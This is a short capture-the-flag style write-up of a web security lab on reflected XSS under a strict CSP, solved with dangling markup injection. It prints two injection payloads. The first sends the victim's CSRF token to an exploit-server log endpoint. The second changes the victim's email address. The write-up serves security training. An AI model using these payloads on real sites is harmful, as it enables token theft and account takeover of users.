Skip to content

LAB 29 - Reflected XSS protected by very strict CSP, with dangling markup attack

Initial instructions

This lab using a strict CSP that blocks outgoing requests to external web sites.

To solve the lab, first perform a cross-site scripting attack that bypasses the CSP and exfiltrates a simulated victim user's CSRF token using Burp Collaborator. You then need to change the simulated user's email address to hacker@evil-user.net.

You must label your vector with the word "Click" in order to induce the simulated user to click it. For example: Click me

You can log in to your own account using the following credentials: wiener:peter

First of all I logged in with the given credentials and tried to change the email manually via GET method in the URL, which may indicate a possible injection point for XSS.

alt text

Once we know this we can try to exfiltrate the csrf with the following payload to see if its vulnerable.

<script>
location = 'https://LAB-ID.web-security-academy.net/my-account?email="></form><form class="login-form" name="change-email-form" action="https://EXPLOIT-SERVER-ID.exploit-server.net/log" method="GET"><button class="button" type="submit">Click me</button>';
</script>

alt text

If we click store and then we view the exploit we will see the following.

alt text

If we press on Click me it will redirect us to the log site, here we can see we are exfiltrating the csrf.

alt text

So we can build the following request to send it to the victim and change its email.

<script>
location = 'https://LAB-ID.web-security-academy.net/my-account?email="></form><form class="login-form" name="change-email-form" action="/my-account/change-email" method="POST"><button class="button" type="submit">Click me</button><input required type="hidden" name="email" value="astro@astro.net">';
</script>

So lets send the request to the victim.

alt text

Congratulations, you solved the lab!